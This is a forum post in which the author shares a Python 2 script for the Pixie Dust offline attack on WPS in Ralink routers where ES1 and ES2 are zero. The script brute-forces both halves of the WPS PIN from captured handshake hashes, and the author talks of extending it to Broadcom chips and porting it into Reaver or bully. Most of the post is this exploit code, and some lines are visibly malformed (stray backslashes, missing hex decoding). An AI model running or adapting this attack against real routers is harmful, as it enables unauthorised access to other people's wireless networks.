Hi Guys,

I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/
import hashlib, hmac

PK_E    = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"\

PK_R    = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"\

eHash1  = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43".decode("hex")
eHash2  = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416".decode("hex")
AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea".decode("hex")

# if ES1,ES2 are found out, recover the halves of PIN
second_half = first_half = 0
es1         = es2        = '\00' * 16   # (str(es2).zfill(32)).decode('hex')
for first_half in xrange(10000):
	PSK1_guess   = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16]
	eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
	if (eHash1 == eHash1_guess): #First half done
		for second_half in xrange(10000):
			PSK2_guess   = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16]
			eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
			if (eHash2 == eHash2_guess): 
				print "PIN FOUND!  %04d%04d" %(first_half,second_half)
				# doWPSprotocolWithPINguessed() #TODO
I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.
